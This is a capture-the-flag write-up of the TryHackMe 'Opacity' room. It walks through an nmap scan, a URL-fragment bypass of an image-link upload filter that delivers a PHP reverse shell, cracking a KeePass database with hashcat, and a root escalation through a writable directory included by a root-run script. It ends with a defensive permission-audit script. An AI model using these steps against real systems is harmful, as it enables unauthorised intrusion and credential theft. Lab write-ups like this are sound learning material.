Opacity TryHackMe - Writeup

Opacity

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

 


Introduction:

Opacity is an easy machine that can help you in the penetration testing learning process.

There are 2 hash keys located on the machine (user - local.txt and root - proof.txt). Can you find them and become root?

Hint: There are several ways to perform an action; always analyze the behavior of the application.


Welcome, guys. In this blog we are going to walk through the full write-up of the Opacity challenge from TryHackMe.

Scanning:

As usual, we start with an Nmap scan (-sS needs root; add -sV if you also want service versions):

nmap -sS -sC 10.10.251.55


Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-10 10:29 EDT
Nmap scan report for 10.10.251.55
Host is up (0.24s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
|   256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_  256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp  open  http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-title: Login
|_Requested resource was login.php
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb2-time:
|   date: 2023-04-10T14:29:20
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap done: 1 IP address (1 host up) scanned in 43.17 seconds

 

From the result we can see four open ports: SSH (22), HTTP (80) and SMB (139 and 445). Two details worth noting for later: the PHPSESSID cookie is set without the HttpOnly flag, and SMB message signing is enabled but not required.

On port 80 we land on a login panel (login.php).

 

A quick SQL injection attempt against the login form does not work. Running dirbuster against the site turned up several directories (see the screenshot).

Exploring those directories, I found the pages shown in the screenshot; one of them has an image upload field that takes a link.

 

Getting into the machine:

The upload field takes a link to an image rather than a file, so we can make the server fetch a PHP reverse shell from our own machine and then get a shell from it.

First download a PHP reverse shell, set the listener IP address and port in it to your attacking host, and serve the file from your machine (for example with python3 -m http.server). The upload form only accepts links that end in an image extension, so submit the link with a fragment appended:

http://<your-ip>/exploit.php#.png

Everything after "#" is a URL fragment: the check on the target sees a string ending in ".png", but the client that downloads the link never sends the fragment, so it actually requests exploit.php. My first attempt was to rename the file itself (cp shell.php exploit.php#.png): the upload succeeds, but no shell comes back, because the target asks our web host for exploit.php, which no longer exists under that name. Keep the file named exploit.php on your host and put the "#.png" only in the submitted link.

Paste the image link into the upload field with a netcat listener waiting on the port set in the shell (if it does not call back straight away, browse to the uploaded file so the server executes it) and we get the shell.

 

The shell we get back is a bare, non-interactive one, so the first thing to do is upgrade it to a proper TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Then press Ctrl+Z to background the shell and, on the attacking host, run:

stty raw -echo; fg

This gives us a normal interactive shell with tab completion and job control. We are still the web server user, so the real privilege escalation comes next.

 

Local User Escalation:

As the web server user we do not have permission to read the files we are after. Looking around the file system, I found a suspicious file in /opt: a KeePass database, dataset.kdbx.

Download the file and extract a crackable hash from it with keepass2john:

keepass2john dataset.kdbx > data.txt

keepass2john prefixes the hash with the file name and a colon ("dataset:$keepass$..."); hashcat mode 13400 expects the bare "$keepass$..." string, so either strip the prefix (cut -d: -f2-) or pass --username. Then crack it with rockyou:

hashcat -a 0 -m 13400 data.txt /home/kali/Downloads/rockyou.txt

Open dataset.kdbx in keepassxc with the cracked master password; it holds the password for the user sysadmin.

Log in over SSH as sysadmin with that password and read the local flag (local.txt).

 

Root Privilege Escalation:

After finding the local flag, I found a suspicious file in the /scripts/lib folder.

The backup script, backup.inc.php, is run with root privileges and picks up the PHP files in /scripts/lib, a directory we can write to. So a PHP reverse shell dropped there will be executed as root.

Copy the reverse shell to /scripts/lib, start a netcat listener and wait for the scheduled run to connect back.

At last we have root and can read the root flag (proof.txt).
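The root step above works because a privileged script loads code from a directory a low-privileged user can write to. The audit below, an added example and not the author's code or anything from the room, builds a constructed throw-away copy of that weak layout (a lib/ directory holding two placeholder includes) and reports where an unprivileged account could inject or alter code. The directory names, file names and the uid 65534 ("nobody") are assumptions of the example; the check uses mode bits rather than os.access so the verdict does not depend on who runs it.

```python
import os
import stat
import tempfile
from pathlib import Path

# Extensions a privileged script typically includes or executes.
INCLUDE_EXTS = {".php", ".inc", ".sh", ".py"}

# An unprivileged uid that owns nothing in the constructed tree, standing in for
# the web-server user. 65534 is the conventional uid of 'nobody'; fall back if
# the audit itself happens to run as that user.
UNPRIV_UID = 65534 if os.getuid() != 65534 else 65533


def writable_by(st: os.stat_result, uid: int, gids) -> bool:
    """Decide from the mode bits alone whether a user with this uid and these
    gids may write the inode, following the Unix rule that only the owner
    class applies when the uid matches, then the group class, then other."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_include_dir(include_dir: str, uid: int, gids) -> list:
    """Audit a directory that a root-run script loads code from.

    Returns a list of (kind, path) findings:
      ('dir-writable', d)  - uid can create files in d, so a new *.php dropped
                             there gets picked up (the situation in the writeup)
      ('file-writable', f) - uid can modify an existing include in place
    """
    findings = []
    top = Path(include_dir)
    for d in [top, *sorted(p for p in top.rglob("*") if p.is_dir())]:
        if writable_by(d.stat(), uid, gids):
            findings.append(("dir-writable", str(d)))
    for f in sorted(p for p in top.rglob("*") if p.is_file()):
        if f.suffix.lower() in INCLUDE_EXTS and writable_by(f.stat(), uid, gids):
            findings.append(("file-writable", str(f)))
    return findings


def demo_layout() -> str:
    """Build a constructed, throw-away copy of the weak layout: a lib/ directory
    writable by everyone, holding one sane include (0644) and one sloppy include
    (0666). Returns the lib path. Nothing here is copied from the room."""
    base = tempfile.mkdtemp(prefix="audit-demo-")
    lib = Path(base, "lib")
    lib.mkdir()
    (lib / "backup_helper.php").write_text("<?php // constructed placeholder\n")
    (lib / "old_helper.php").write_text("<?php // constructed placeholder\n")
    os.chmod(lib / "backup_helper.php", 0o644)
    os.chmod(lib / "old_helper.php", 0o666)
    os.chmod(lib, 0o777)
    return str(lib)


def harden_layout(lib: str) -> str:
    """The fix: the include directory and every file in it are writable by the
    owner only (0755 / 0644). In production the owner must also be root."""
    os.chmod(lib, 0o755)
    for f in Path(lib).rglob("*"):
        if f.is_file():
            os.chmod(f, 0o644)
    return lib


if __name__ == "__main__":
    lib = demo_layout()
    for kind, path in audit_include_dir(lib, UNPRIV_UID, {UNPRIV_UID}):
        print(f"{kind:14} {path}")
    harden_layout(lib)
    print("after hardening:", audit_include_dir(lib, UNPRIV_UID, {UNPRIV_UID}))
```

Run against a real host, point audit_include_dir at the directory the root cron job or script includes from and pass the uid and groups of the account you hold; an empty result for that account is what a correctly set up /scripts/lib should give.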

 

 Thank you for reading my blog.

Happy hacking!
